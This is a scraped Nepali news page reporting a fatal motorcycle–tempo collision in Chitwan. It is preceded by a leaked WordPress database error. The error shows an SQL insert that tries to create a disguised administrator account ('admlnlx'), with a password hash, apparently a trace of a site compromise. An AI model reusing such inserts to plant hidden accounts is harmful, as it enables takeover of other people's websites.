WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN8EAqfnrfwxfCM.O9q52Hbpt1WTam0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 14:40:21', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
सवारी दुर्घटनामा एकको मृत्यु – Gaule Khabar

सवारी दुर्घटनामा एकको मृत्यु

सवारी दुर्घटनामा एकको मृत्यु

चितवन,मंसिर २४-

पुर्वीचितवनको पदमपुरमा भएको सवारी दुर्घटनामा एकजनाको मृत्यु भएको छ । कालिका नगरपालिका १० गाबिस चोकमा गएराती ना १ ह ७३८ नम्बरको टेम्पोको पछाडी ना १५ प ८४३३ नम्बरको मोटरसाइकल ठक्कर खाँदा मोटरसाइकल चालकको मृत्यु भएको छ । दुर्घटनामा गम्भीर घाईते भएका कालिका नगरपालिका १२ बस्ने मोटरसाईकल चालक अनिल सिहं ठकुरीको उपचारका क्रममा चितवन मेडिकल कलेजमा मृत्यु भएको ईलाका प्रहरी कार्यालय टाँडीले जनाएको छ । घटना पछि टेम्पो चालक सम्पर्कमा नरहेको र उनको खोजी कार्य भईरहेको ईलाका प्रहरी कार्यालय टाँडीका प्रमुख नारायण रन्जीतकारले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका